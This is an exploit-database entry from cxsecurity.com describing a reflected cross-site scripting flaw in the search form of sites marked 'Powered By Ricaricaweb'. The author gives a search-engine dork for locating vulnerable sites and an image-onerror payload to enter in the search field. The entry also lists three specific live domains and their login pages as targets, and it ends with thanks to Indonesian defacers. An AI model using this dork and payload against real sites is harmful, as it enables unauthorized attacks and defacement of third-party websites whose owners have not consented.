Powered By Ricaricaweb Cross Site Scripting Vulnerabiliry (Form Search)

2018.12.22
id 4nzeL4 (ID) id
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

################################################################################################ Title : Powered By Ricaricaweb Cross Site Scripting Vulnerabiliry (Form Search) Dork : intext"Powered By Ricaricaweb" | inurl:/login Exploit: /search Payload: "><img src=x onerror=alert('XSS Attack')> Poof: you must input the payload on form search and you can get XSS Vulnerability Vendor: www.anm.co.id/login www.kitomaindonesia.com/login www.xrayindonesia.com/login ================================================================ Special Thanks to: ALL INDONESIAN DEFACER ##############################################################################################


Vote for this issue:
75%
25%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top